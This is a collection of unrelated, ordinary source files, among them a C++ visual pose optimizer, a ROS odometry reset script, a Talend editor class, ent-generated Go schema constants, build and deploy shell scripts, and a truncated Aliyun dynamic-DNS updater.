'offerType']); export default { init({ options, meta, events, track }) { if (options._legacy && stringStartsWith(meta.offerType, 'NI')) { events.on('click', evt => { const { target } = evt; if (target.tagName === 'IMG' && target.parentNode.tagName === 'A') { window.open( target.parentNode.href, 'PayPal Credit Terms', 'width=650,height=600,scrollbars=yes,resizable=no,location=no,toolbar=no,menubar=no,dependent=no,dialog=yes,minimizable=no' ); evt.preventDefault(); } else { window.open(meta.clickUrl, '_blank'); } }); } else { const { open: openModal } = getModal({ ...options, ...meta, track }); events.on('click', openModal); } } };
// Copyright (c) 2015-2016, ETH Zurich, <NAME>, Zurich Eye // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright // notice, this list of conditions and the following disclaimer in the // documentation and/or other materials provided with the distribution. // * Neither the name of the ETH Zurich, Wyss Zurich, Zurich Eye nor the // names of its contributors may be used to endorse or promote products // derived from this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND // ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED // WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE // DISCLAIMED. IN NO EVENT SHALL ETH Zurich, <NAME>urich, Zurich Eye BE LIABLE FOR ANY // DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; // LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND // ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS // SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #include <ze/geometry/clam.hpp> #include <ze/geometry/pose_optimizer.hpp> #include <ze/geometry/pose_prior.hpp> namespace ze { Clam::Clam( const ClamLandmarks& landmarks, const std::vector<ClamFrameData>& data, const CameraRig& rig, const Transformation& T_Bc_Br_prior, const real_t prior_weight_pos, const real_t prior_weight_rot) : landmarks_(landmarks) , data_(data) , rig_(rig) , T_Bc_Br_prior_(T_Bc_Br_prior) , prior_weight_pos_(prior_weight_pos) , prior_weight_rot_(prior_weight_rot) { measurement_sigma_localization_.resize(data.size()); CHECK_EQ(landmarks_.f_Br.cols(), landmarks_.origin_Br.cols()); } real_t Clam::evaluateError( const ClamState& state, HessianMatrix* H, GradientVector* g) { CHECK_EQ(data_.size(), measurement_sigma_localization_.size()); real_t chi2 = 0.0; const Transformation& T_Bc_Br = state.at<0>(); const VectorX& inv_depth = state.at<1>(); // --------------------------------------------------------------------------- // Localization // Loop over all cameras in rig. for (size_t i = 0; i < data_.size(); ++i) { const ClamFrameData& data = data_[i]; real_t& measurement_sigma = measurement_sigma_localization_[i]; // Continue if we have no landmarks to localize with. if(data.p_Br.cols() == 0) { VLOG(300) << "Cam " << i << " has no landmarks to localize."; continue; } // Transform points from reference coordinates to camera coordinates. const Transformation T_C_Br = data.T_C_B * T_Bc_Br; //! @todo(cfo): use inverse-depth coordinates! const Positions p_C = T_C_Br.transformVectorized(data.p_Br); // Normalize points to obtain estimated bearing vectors. Bearings f_est = p_C; normalizeBearings(f_est); // Compute difference between bearing vectors. Bearings f_err = f_est - data.f_C; const VectorX f_err_norm = f_err.colwise().norm(); // At the first iteration, compute the scale of the error. if(iter_ == 0) { measurement_sigma = ScaleEstimator::compute(f_err_norm); } // Robust cost function. const VectorX weights = WeightFunction::weightVectorized(f_err_norm / measurement_sigma); // Whiten error. f_err /= measurement_sigma; if (H && g) { const Matrix3 R_C_Br = T_C_Br.getRotationMatrix(); const int n = data.f_C.cols(); Matrix36 G; G.block<3,3>(0,0) = I_3x3; for (int i = 0; i < n; ++i) { // Jacobian computation. G.block<3,3>(0,3) = - skewSymmetric(data.p_Br.col(i)); Matrix3 J_normalization = dBearing_dLandmark(p_C.col(i)); Matrix36 J = J_normalization * R_C_Br * G; // Whiten Jacobian. J /= measurement_sigma; // Compute Hessian and Gradient Vector. H->topLeftCorner<6,6>().noalias() += J.transpose() * J * weights(i); g->head<6>().noalias() -= J.transpose() * f_err.col(i) * weights(i); } } // Compute log-likelihood : 1/(2*sigma^2)*(z-h(x))^2 = 1/2*e'R'*R*e chi2 += 0.5 * weights.dot(f_err.colwise().squaredNorm()); } // --------------------------------------------------------------------------- // Mapping //! @todo(cfo): This can be optimized a lot! for (size_t i = 0; i < data_.size(); ++i) { const ClamFrameData& data = data_[i]; const Camera& cam = rig_.at(i); for (const std::pair<uint32_t, Keypoint>& m : data.landmark_measurements) { Matrix26 H1; Matrix21 H2; CHECK_LT(m.first, landmarks_.f_Br.cols()); CHECK_LT(m.first, inv_depth.size()); Vector2 err = reprojectionResidual( landmarks_.f_Br.col(m.first), landmarks_.origin_Br.col(m.first), cam, data.T_C_B, T_Bc_Br, inv_depth(m.first), m.second, &H1, &H2); // Robust cost function. const real_t weight = 1.0; //!< @todo(cfo) // Whiten error err /= measurement_sigma_mapping_; Matrix2X J(2, g->size()); J.setZero(); J.block<2,6>(0, 0) = H1; J.block<2,1>(0, 6 + m.first) = H2; // Whiten Jacobian. J /= measurement_sigma_mapping_; // Compute Hessian and Gradient Vector. H->noalias() += J.transpose() * J * weight; g->noalias() -= J.transpose() * err * weight; // Compute log-likelihood : 1/(2*sigma^2)*(z-h(x))^2 = 1/2*e'R'*R*e chi2 += 0.5 * weight * err.squaredNorm(); } } // --------------------------------------------------------------------------- // Prior if (prior_weight_rot_ > 0.0f || prior_weight_pos_ > 0.0f) { applyPosePrior( T_Bc_Br, T_Bc_Br_prior_, prior_weight_rot_, prior_weight_pos_, H->block<6,6>(0,0), g->segment<6>(0)); } return chi2; } } // namespace ze
<reponame>MikeHallettUK/RosRobotics # read Odometry and reset to zero import rospy from nav_msgs.msg import Odometry # nav_msgs/Odometry.msg from std_msgs.msg import Empty from tf.transformations import euler_from_quaternion from math import radians, cos, tan, sin, sqrt, atan, pi, asin, exp import numpy as np rospy.init_node('resetter') count = 0 start = rospy.get_rostime() data = np.zeros(7) def QtoYaw(orientation_q): orientation_list = [orientation_q.x, orientation_q.y, orientation_q.z, orientation_q.w] (roll, pitch, yaw) = euler_from_quaternion (orientation_list) if yaw<0: yaw = 2*pi + yaw # goes from 0 to 2*pi, anti-clockwise. jumps at 0:2pi return yaw def get_odom(msg): # at ~ 30 Hz global start, data yaw = QtoYaw(msg.pose.pose.orientation) x = msg.pose.pose.position.x y = msg.pose.pose.position.y move = msg.twist.twist.linear.x drift = msg.twist.twist.linear.y turn = msg.twist.twist.angular.z now = msg.header.stamp - start seconds = now.to_sec() # time in floating point data = np.copy((move, turn, drift, yaw, x, y, seconds)) subO = rospy.Subscriber('/odom', Odometry, get_odom) # nav_msgs/Odometry reset_odom = rospy.Publisher('/reset', Empty, queue_size=1) # rostopic pub /reset std_msgs/Empty "{}" print("Waiting for odom call back to start...") while data[6] == 0: # wait for odom call back to start... rospy.sleep(0.1) while count < 5: datacopy = np.copy(data) yaw = datacopy[3] if yaw > pi: yaw = yaw - 2*pi print("At %.3f secs, x %.4f , y %.4f : yaw %.4f, drift %.6f" % (datacopy[6], datacopy[4], datacopy[5], yaw, datacopy[2])) # (move, turn, drift, yaw, x, y, seconds) if abs(yaw) < 0.005: # eg. yaw is zeroed to better than +/- 0.3 degrees rospy.loginfo("Zero") break if count < 4: reset_odom.publish(Empty()) print("reset") rospy.sleep(4.0) # it takes ~ 3 seconds to reset .... count = count + 1 # end of program ...
#!/bin/bash gcc -Wall -Werror -Wextra srcs/gnl_tester_devrandom.c ../get_next_line.c ../get_next_line_utils.c -I ../ -D BUFFER_SIZE=42 && ./a.out
#ifndef LITE_PACK_LOAD_EXT_H #define LITE_PACK_LOAD_EXT_H #include "lite_pack/first_byte.h" #include "load_number.h" static inline unsigned __lip_load_fixext(unsigned char const buf[], uint8_t *type) { *type = __lip_load_num8(buf).u; return 1; } static inline unsigned __lip_load_ext8(unsigned char const buf[], unsigned *size, uint8_t *type) { *size = __lip_load_num8(buf).u; *type = __lip_load_num8(buf + 1).u; return 2; } static inline unsigned __lip_load_ext16(unsigned char const buf[], unsigned *size, uint8_t *type) { *size = __lip_load_num16(buf).u; *type = __lip_load_num8(buf + 2).u; return 3; } static inline unsigned __lip_load_ext32(unsigned char const buf[], unsigned *size, uint8_t *type) { *size = __lip_load_num32(buf).u; *type = __lip_load_num8(buf + 4).u; return 5; } #endif
<filename>main/plugins/org.talend.designer.core/src/main/java/org/talend/designer/core/ui/MultiPageTalendEditor.java // ============================================================================ // // Copyright (C) 2006-2021 Talend Inc. - www.talend.com // // This source code is available under agreement available at // %InstallDIR%\features\org.talend.rcp.branding.%PRODUCTNAME%\%PRODUCTNAME%license.txt // // You should have received a copy of the agreement // along with this program; if not, write to Talend SA // 9 rue Pages 92150 Suresnes, France // // ============================================================================ package org.talend.designer.core.ui; import org.eclipse.core.runtime.IProgressMonitor; import org.eclipse.swt.widgets.Text; import org.eclipse.ui.IEditorInput; import org.eclipse.ui.IEditorSite; import org.eclipse.ui.IFileEditorInput; import org.eclipse.ui.PartInitException; import org.talend.core.GlobalServiceRegister; import org.talend.core.PluginChecker; import org.talend.core.model.process.IProcess2; import org.talend.core.model.properties.Item; import org.talend.core.model.properties.JobletProcessItem; import org.talend.core.model.properties.Property; import org.talend.core.services.ISVNProviderService; import org.talend.core.ui.branding.IBrandingService; import org.talend.designer.core.i18n.Messages; import org.talend.designer.core.ui.editor.AbstractTalendEditor; import org.talend.designer.core.ui.editor.ProcessEditorInput; import org.talend.designer.core.ui.editor.TalendEditor; /** * This class is the main editor, the differents pages in it are: <br/> * <b>1)</b> {@link TalendEditor} <br/> * <b>2)</b> {@link Text Editor on the generated code} <br/> * <br/> * This class uses the interface ISelectionListener, it allows to propage the Delete evenement to the designer. <br/> * * $Id$ * */ public class MultiPageTalendEditor extends AbstractMultiPageTalendEditor { public static final String ID = "org.talend.designer.core.ui.MultiPageTalendEditor"; //$NON-NLS-1$ public MultiPageTalendEditor() { this(true); } protected MultiPageTalendEditor(boolean withDefaultEditor) { super(); if (withDefaultEditor) { designerEditor = new TalendEditor(); } } /** * Getter for designerEditor. * * @return the designerEditor */ @Override public AbstractTalendEditor getDesignerEditor() { return this.designerEditor; } /** * Creates the pages of the multi-page editor. */ @Override protected void createPages() { super.createPages(); } /** * The <code>MultiPageEditorExample</code> implementation of this method checks that the input is an instance of * <code>IFileEditorInput</code>. */ @Override public void init(final IEditorSite site, final IEditorInput editorInput) throws PartInitException { if (!(editorInput instanceof IFileEditorInput) && !(editorInput instanceof ProcessEditorInput)) { throw new PartInitException(Messages.getString("MultiPageTalendEditor.InvalidInput")); //$NON-NLS-1$ } super.init(site, editorInput); } /** * DOC smallet Comment method "setName". * * @param label */ @Override public void setName() { if (getEditorInput() == null) { return; } super.setName(); IProcess2 process2 = this.getProcess(); if (process2 == null) { return; } Property property = process2.getProperty(); if (property == null) { return; } String label = property.getDisplayName(); String jobVersion = "0.1"; //$NON-NLS-1$ if (process2 != null) { jobVersion = process2.getVersion(); } // if (getActivePage() == 1) { ISVNProviderService service = null; if (PluginChecker.isSVNProviderPluginLoaded()) { service = (ISVNProviderService) GlobalServiceRegister.getDefault().getService(ISVNProviderService.class); if (revisionChanged && service.isProjectInSvnMode()) { revisionNumStr = service.getCurrentSVNRevision(process2); revisionChanged = false; if (revisionNumStr != null) { revisionNumStr = ".r" + revisionNumStr; //$NON-NLS-1$ } } } String title = "MultiPageTalendEditor.Job";//$NON-NLS-1$ if (process2 != null) { Item item = process2.getProperty().getItem(); if (item instanceof JobletProcessItem) { title = "MultiPageTalendEditor.Joblet";//$NON-NLS-1$ } } IBrandingService brandingService = (IBrandingService) GlobalServiceRegister.getDefault().getService( IBrandingService.class); boolean allowVerchange = brandingService.getBrandingConfiguration().isAllowChengeVersion(); if (allowVerchange) { if (revisionNumStr != null) { setPartName(Messages.getString(title, label, jobVersion) + revisionNumStr); } else { setPartName(Messages.getString(title, label, jobVersion)); } } else { if (revisionNumStr != null) { setPartName(Messages.getString(title, label, "") + revisionNumStr);//$NON-NLS-1$ } else { setPartName(Messages.getString(title, label, "")); //$NON-NLS-1$ } } } /* * (non-Javadoc) * * @see org.talend.designer.core.ui.AbstractMultiPageTalendEditor#getEditorId() */ @Override public String getEditorId() { return ID; } @Override public void doSave(IProgressMonitor monitor) { if (haveDirtyJoblet()) { return; } // TODO Auto-generated method stub super.doSave(monitor); this.setName(); } }
#!/usr/bin/env bash cd "$(dirname "${BASH_SOURCE[0]}")" \ && . "../utils.sh" srcdir="$(cd .. && pwd)" # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - create_directories() { echo "" declare -a DIRECTORIES=( "$HOME/Projects" "$HOME/.config" "$HOME/.local/share/torrents" "$HOME/.local/.configs" ) for i in "${DIRECTORIES[@]}"; do mkd "$i" done } # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - main() { create_directories } main
DROP TABLE if exists b_bp_workflow_template; DROP TABLE if exists b_bp_workflow_state; DROP TABLE if exists b_bp_workflow_permissions; DROP TABLE if exists b_bp_workflow_instance; DROP TABLE if exists b_bp_tracking; DROP TABLE if exists b_bp_task; DROP TABLE if exists b_bp_task_user; DROP TABLE if exists b_bp_history;
<reponame>filipecorrea/read-and-rank angular.module('read-and-learn').controller('qaController', function ($scope, $rootScope, $http) { $scope.documents = null; $scope.error = null; var cluster_id = 'scf9b13b48_1835_48cf_ac7f_143b7bb8712b'; var config_name = 'example-config'; var collection_name = 'example-collection3'; $scope.textChanged = function(event) { if ($scope.question) { $scope.documents = null; $scope.error = null; // TODO Set timeout to show message if no result is found // Call API to retrieve documents $http({ method: 'POST', url: '/api/retrieve-and-rank/' + cluster_id + '/' + config_name + '/' + collection_name + '/documents', data: { 'query': $scope.question } }).then(function successCallback(response) { $scope.documents = response.data.docs; }, function errorCallback(response) { $scope.error = response; }); } }; });
#!/bin/bash # MIT License # # Copyright (c) Microsoft Corporation. All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE set -o errexit set -o nounset set -o pipefail BASH_DIR=$(cd $(dirname ${BASH_SOURCE}) && pwd) # Ensure ${PROJECT_DIR} is ${GOPATH}/src/github.com/microsoft/frameworkcontroller PROJECT_DIR=${BASH_DIR}/../.. DIST_DIR=${PROJECT_DIR}/dist/frameworkbarrier cd ${PROJECT_DIR} rm -rf ${DIST_DIR} mkdir -p ${DIST_DIR} go build -o ${DIST_DIR}/frameworkbarrier cmd/frameworkbarrier/* chmod a+x ${DIST_DIR}/frameworkbarrier cp -r bin/frameworkbarrier/* ${DIST_DIR} echo Succeeded to build binary distribution into ${DIST_DIR}: cd ${DIST_DIR} && ls -lR .
<reponame>blushft/strana // Code generated by entc, DO NOT EDIT. package event import ( "fmt" ) const ( // Label holds the string label denoting the event type in the database. Label = "event" // FieldID holds the string denoting the id field in the database. FieldID = "id" // FieldTrackingID holds the string denoting the tracking_id field in the database. FieldTrackingID = "tracking_id" // FieldEvent holds the string denoting the event field in the database. FieldEvent = "event" // FieldNonInteractive holds the string denoting the non_interactive field in the database. FieldNonInteractive = "non_interactive" // FieldChannel holds the string denoting the channel field in the database. FieldChannel = "channel" // FieldPlatform holds the string denoting the platform field in the database. FieldPlatform = "platform" // FieldProperties holds the string denoting the properties field in the database. FieldProperties = "properties" // FieldTimestamp holds the string denoting the timestamp field in the database. FieldTimestamp = "timestamp" // EdgeAction holds the string denoting the action edge name in mutations. EdgeAction = "action" // EdgeAlias holds the string denoting the alias edge name in mutations. EdgeAlias = "alias" // EdgeApp holds the string denoting the app edge name in mutations. EdgeApp = "app" // EdgeBrowser holds the string denoting the browser edge name in mutations. EdgeBrowser = "browser" // EdgeCampaign holds the string denoting the campaign edge name in mutations. EdgeCampaign = "campaign" // EdgeConnectivity holds the string denoting the connectivity edge name in mutations. EdgeConnectivity = "connectivity" // EdgeDevice holds the string denoting the device edge name in mutations. EdgeDevice = "device" // EdgeExtra holds the string denoting the extra edge name in mutations. EdgeExtra = "extra" // EdgeGroup holds the string denoting the group edge name in mutations. EdgeGroup = "group" // EdgeLibrary holds the string denoting the library edge name in mutations. EdgeLibrary = "library" // EdgeLocation holds the string denoting the location edge name in mutations. EdgeLocation = "location" // EdgeNetwork holds the string denoting the network edge name in mutations. EdgeNetwork = "network" // EdgeOs holds the string denoting the os edge name in mutations. EdgeOs = "os" // EdgePage holds the string denoting the page edge name in mutations. EdgePage = "page" // EdgeReferrer holds the string denoting the referrer edge name in mutations. EdgeReferrer = "referrer" // EdgeScreen holds the string denoting the screen edge name in mutations. EdgeScreen = "screen" // EdgeSession holds the string denoting the session edge name in mutations. EdgeSession = "session" // EdgeTiming holds the string denoting the timing edge name in mutations. EdgeTiming = "timing" // EdgeViewport holds the string denoting the viewport edge name in mutations. EdgeViewport = "viewport" // EdgeUser holds the string denoting the user edge name in mutations. EdgeUser = "user" // Table holds the table name of the event in the database. Table = "events" // ActionTable is the table the holds the action relation/edge. ActionTable = "actions" // ActionInverseTable is the table name for the Action entity. // It exists in this package in order to avoid circular dependency with the "action" package. ActionInverseTable = "actions" // ActionColumn is the table column denoting the action relation/edge. ActionColumn = "event_action" // AliasTable is the table the holds the alias relation/edge. AliasTable = "alias" // AliasInverseTable is the table name for the Alias entity. // It exists in this package in order to avoid circular dependency with the "alias" package. AliasInverseTable = "alias" // AliasColumn is the table column denoting the alias relation/edge. AliasColumn = "event_alias" // AppTable is the table the holds the app relation/edge. AppTable = "events" // AppInverseTable is the table name for the App entity. // It exists in this package in order to avoid circular dependency with the "app" package. AppInverseTable = "apps" // AppColumn is the table column denoting the app relation/edge. AppColumn = "event_app" // BrowserTable is the table the holds the browser relation/edge. BrowserTable = "browsers" // BrowserInverseTable is the table name for the Browser entity. // It exists in this package in order to avoid circular dependency with the "browser" package. BrowserInverseTable = "browsers" // BrowserColumn is the table column denoting the browser relation/edge. BrowserColumn = "event_browser" // CampaignTable is the table the holds the campaign relation/edge. CampaignTable = "events" // CampaignInverseTable is the table name for the Campaign entity. // It exists in this package in order to avoid circular dependency with the "campaign" package. CampaignInverseTable = "campaigns" // CampaignColumn is the table column denoting the campaign relation/edge. CampaignColumn = "event_campaign" // ConnectivityTable is the table the holds the connectivity relation/edge. ConnectivityTable = "connectivities" // ConnectivityInverseTable is the table name for the Connectivity entity. // It exists in this package in order to avoid circular dependency with the "connectivity" package. ConnectivityInverseTable = "connectivities" // ConnectivityColumn is the table column denoting the connectivity relation/edge. ConnectivityColumn = "event_connectivity" // DeviceTable is the table the holds the device relation/edge. DeviceTable = "events" // DeviceInverseTable is the table name for the Device entity. // It exists in this package in order to avoid circular dependency with the "device" package. DeviceInverseTable = "devices" // DeviceColumn is the table column denoting the device relation/edge. DeviceColumn = "event_device" // ExtraTable is the table the holds the extra relation/edge. ExtraTable = "events" // ExtraInverseTable is the table name for the Extra entity. // It exists in this package in order to avoid circular dependency with the "extra" package. ExtraInverseTable = "extras" // ExtraColumn is the table column denoting the extra relation/edge. ExtraColumn = "event_extra" // GroupTable is the table the holds the group relation/edge. GroupTable = "events" // GroupInverseTable is the table name for the Group entity. // It exists in this package in order to avoid circular dependency with the "group" package. GroupInverseTable = "groups" // GroupColumn is the table column denoting the group relation/edge. GroupColumn = "event_group" // LibraryTable is the table the holds the library relation/edge. LibraryTable = "events" // LibraryInverseTable is the table name for the Library entity. // It exists in this package in order to avoid circular dependency with the "library" package. LibraryInverseTable = "libraries" // LibraryColumn is the table column denoting the library relation/edge. LibraryColumn = "event_library" // LocationTable is the table the holds the location relation/edge. LocationTable = "events" // LocationInverseTable is the table name for the Location entity. // It exists in this package in order to avoid circular dependency with the "location" package. LocationInverseTable = "locations" // LocationColumn is the table column denoting the location relation/edge. LocationColumn = "event_location" // NetworkTable is the table the holds the network relation/edge. NetworkTable = "events" // NetworkInverseTable is the table name for the Network entity. // It exists in this package in order to avoid circular dependency with the "network" package. NetworkInverseTable = "networks" // NetworkColumn is the table column denoting the network relation/edge. NetworkColumn = "event_network" // OsTable is the table the holds the os relation/edge. OsTable = "events" // OsInverseTable is the table name for the OSContext entity. // It exists in this package in order to avoid circular dependency with the "oscontext" package. OsInverseTable = "os" // OsColumn is the table column denoting the os relation/edge. OsColumn = "event_os" // PageTable is the table the holds the page relation/edge. PageTable = "events" // PageInverseTable is the table name for the Page entity. // It exists in this package in order to avoid circular dependency with the "page" package. PageInverseTable = "pages" // PageColumn is the table column denoting the page relation/edge. PageColumn = "event_page" // ReferrerTable is the table the holds the referrer relation/edge. ReferrerTable = "events" // ReferrerInverseTable is the table name for the Referrer entity. // It exists in this package in order to avoid circular dependency with the "referrer" package. ReferrerInverseTable = "referrers" // ReferrerColumn is the table column denoting the referrer relation/edge. ReferrerColumn = "event_referrer" // ScreenTable is the table the holds the screen relation/edge. ScreenTable = "events" // ScreenInverseTable is the table name for the Screen entity. // It exists in this package in order to avoid circular dependency with the "screen" package. ScreenInverseTable = "screens" // ScreenColumn is the table column denoting the screen relation/edge. ScreenColumn = "event_screen" // SessionTable is the table the holds the session relation/edge. SessionTable = "events" // SessionInverseTable is the table name for the Session entity. // It exists in this package in order to avoid circular dependency with the "session" package. SessionInverseTable = "sessions" // SessionColumn is the table column denoting the session relation/edge. SessionColumn = "event_session" // TimingTable is the table the holds the timing relation/edge. TimingTable = "events" // TimingInverseTable is the table name for the Timing entity. // It exists in this package in order to avoid circular dependency with the "timing" package. TimingInverseTable = "timings" // TimingColumn is the table column denoting the timing relation/edge. TimingColumn = "event_timing" // ViewportTable is the table the holds the viewport relation/edge. ViewportTable = "events" // ViewportInverseTable is the table name for the Viewport entity. // It exists in this package in order to avoid circular dependency with the "viewport" package. ViewportInverseTable = "viewports" // ViewportColumn is the table column denoting the viewport relation/edge. ViewportColumn = "event_viewport" // UserTable is the table the holds the user relation/edge. UserTable = "events" // UserInverseTable is the table name for the User entity. // It exists in this package in order to avoid circular dependency with the "user" package. UserInverseTable = "users" // UserColumn is the table column denoting the user relation/edge. UserColumn = "event_user" ) // Columns holds all SQL columns for event fields. var Columns = []string{ FieldID, FieldTrackingID, FieldEvent, FieldNonInteractive, FieldChannel, FieldPlatform, FieldProperties, FieldTimestamp, } // ForeignKeys holds the SQL foreign-keys that are owned by the Event type. var ForeignKeys = []string{ "event_app", "event_campaign", "event_device", "event_extra", "event_group", "event_library", "event_location", "event_network", "event_os", "event_page", "event_referrer", "event_screen", "event_session", "event_timing", "event_viewport", "event_user", } // Event defines the type for the event enum field. type Event string // Event values. const ( EventAction Event = "action" EventAlias Event = "alias" EventGroup Event = "group" EventIdentify Event = "identify" EventPageview Event = "pageview" EventScreenview Event = "screenview" EventSession Event = "session" EventTiming Event = "timing" EventTransaction Event = "transaction" ) func (e Event) String() string { return string(e) } // EventValidator is a validator for the "event" field enum values. It is called by the builders before save. func EventValidator(e Event) error { switch e { case EventAction, EventAlias, EventGroup, EventIdentify, EventPageview, EventScreenview, EventSession, EventTiming, EventTransaction: return nil default: return fmt.Errorf("event: invalid enum value for event field: %q", e) } }
package mainclient.fieldStaticAndOverridesStatic; import main.fieldStaticAndOverridesStatic.FieldStaticAndOverridesStatic; public class FieldStaticAndOverridesStaticFA { public int accessFieldFromSubtype() { return FieldStaticAndOverridesStatic.fieldStatic; } }
<reponame>Katistic/3ds_monty<gh_stars>10-100 #include <3ds.h> #include "py/runtime.h" #include "../init_helper.h" #define METHOD_OBJ_N(__args, __n) \ STATIC MP_DEFINE_CONST_FUN_OBJ_##__args(mod_citrus_qtm_##__n##_obj, mod_citrus_qtm_##__n) #define LOCAL_METHOD(__n) \ {MP_OBJ_NEW_QSTR(MP_QSTR_##__n), (mp_obj_t) &mod_citrus_qtm_##__n##_obj} extern const mp_obj_type_t mod_citrus_qtm_HeadTracking_type; static int _mod_citrus_qtm_is_init = 0; STATIC mp_obj_t mod_citrus_qtm_init(void) { INIT_ONCE(_mod_citrus_qtm_is_init); return mp_obj_new_int(qtmInit()); } mp_obj_t mod_citrus_qtm_exit(void) { EXIT_ONCE(_mod_citrus_qtm_is_init); qtmExit(); return mp_const_none; } STATIC mp_obj_t mod_citrus_qtm_check_initialized(void) { return mp_obj_new_bool(qtmCheckInitialized()); } METHOD_OBJ_N(0, init); METHOD_OBJ_N(0, exit); METHOD_OBJ_N(0, check_initialized); STATIC const mp_rom_map_elem_t mp_module_citrus_qtm_globals_table[] = { // Package Info {MP_ROM_QSTR(MP_QSTR___name__), MP_ROM_QSTR(MP_QSTR_qtm)}, // Classes {MP_ROM_QSTR(MP_QSTR_HeadTracking), MP_ROM_PTR(&mod_citrus_qtm_HeadTracking_type)}, // Functions LOCAL_METHOD(init), LOCAL_METHOD(exit), LOCAL_METHOD(check_initialized), }; STATIC MP_DEFINE_CONST_DICT(mp_module_citrus_qtm_globals, mp_module_citrus_qtm_globals_table); const mp_obj_module_t mp_module_citrus_qtm = { .base = {&mp_type_module}, .name = MP_QSTR_qtm, .globals = (mp_obj_dict_t *) &mp_module_citrus_qtm_globals, };
rm -rf ~/server cd ~/ echo git clone "https://github.com/kevinrlewis/jobtrakr.git" server cd ~/server echo npm install fuser -k 3000/tcp node server.js & echo ls ~/server -l
#!/bin/sh #By h46incon #Dependences: bind-dig, curl, openssl-util, tr, sort ## ----- Setting ----- AccessKeyId="testid" AccessKeySec="testsecret" DomainRecordId="00000" # DomainRR, use "@" to set top level domain DomainRR="www" DomainName="example.com" DomainType="A" # DNS Server for check current IP of the record # Perferred setting is your domain name service provider # Leave it blank if using the default DNS Server DNSServer="dns9.hichina.com" # The server address of ALi API ALiServerAddr="alidns.aliyuncs.com" # A url provided by a third-party to echo the public IP of host MyIPEchoUrl="http://members.3322.org/dyndns/getip" # MyIPEchoUrl="http://icanhazip.com" # the generatation a random number can be modified here #((rand_num=${RANDOM} * ${RANDOM} * ${RANDOM})) rand_num=$(openssl rand -hex 16) ## ----- Log level ----- _DEBUG_=true _LOG_=true _ERR_=true ## ===== private ===== ## ----- global var ----- # g_pkey_$i # param keys # g_pval_$key # param values g_pn=0 # number of params _func_ret="" ## ----- Base Util ----- _debug() { ${_DEBUG_} && echo "> $*"; } _log() { ${_LOG_} && echo "* $*"; } _err() { ${_ERR_} && echo "! $*"; } reset_func_ret() { _func_ret="" } ## ----- params ----- # @Param1: Key # @Param2: Value put_param() { eval g_pkey_${g_pn}=$1 eval g_pval_$1=$2 g_pn=$((g_pn + 1)) } # This function will init all public params EXCLUDE "Signature" put_params_public() { put_param "Format" "JSON" put_param "Version" "2015-01-09" put_param "AccessKeyId" "${AccessKeyId}" put_param "SignatureMethod" "HMAC-SHA1" put_param "SignatureVersion" "1.0" # time stamp local time_utc=$(date -u +"%Y-%m-%dT%H:%M:%SZ") _debug time_stamp: ${time_utc} put_param "Timestamp" "${time_utc}" # random number _debug rand_num: ${rand_num} put_param "SignatureNonce" "${rand_num}" } # @Param1: New IP address put_params_UpdateDomainRecord() { put_param "Action" "UpdateDomainRecord" put_param "RR" "${DomainRR}" put_param "RecordId" "${DomainRecordId}" put_param "Type" "${DomainType}" put_param "Value" "${1}" } put_params_DescribeDomainRecords() { put_param "Action" "DescribeDomainRecords" put_param "DomainName" ${DomainName} } pack_params() { reset_func_ret local ret="" local key key_enc val val_enc local i=0 while [ $i -lt ${g_pn} ] do eval key="\$g_pkey_${i}" eval val="\$g_pval_${key}" rawurl_encode "${key}" key_enc=${_func_ret} rawurl_encode "${val}" val_enc=${_func_ret} ret="${ret}${key_enc}=${val_enc}&" i=$((++i)) done #delete last "&" _func_ret=${ret%"&"} } # ----- Other utils ----- get_my_ip() { reset_func_ret local my_ip=$(curl ${MyIPEchoUrl} --silent --connect-timeout 10) #echo ${my_ip} _func_ret=${my_ip} } get_domain_ip() { reset_func_ret local full_domain="" if [ -z "${DomainRR}" ] || [ "${DomainRR}" == "@" ]; then full_domain=${DomainName} else full_domain=${DomainRR}.${DomainName} fi local ns_param="" if [ -z "${DNSServer}" ] ; then ns_param="" else ns_param="@${DNSServer}" fi _func_ret=$(dig "$ns_param" "${full_domain}" +short) } # @Param1: Raw url to be encoded rawurl_encode() { reset_func_ret local string="${1}" local strlen=${#string} local encoded="" local pos c o pos=0 while [ ${pos} -lt ${strlen} ] do c=${string:$pos:1} case "$c" in [-_.~a-zA-Z0-9] ) o="${c}" ;; * ) o=$(printf "%%%02X" "'$c") esac encoded="${encoded}${o}" pos=$(($pos + 1)) done _func_ret="${encoded}" } calc_signature() { 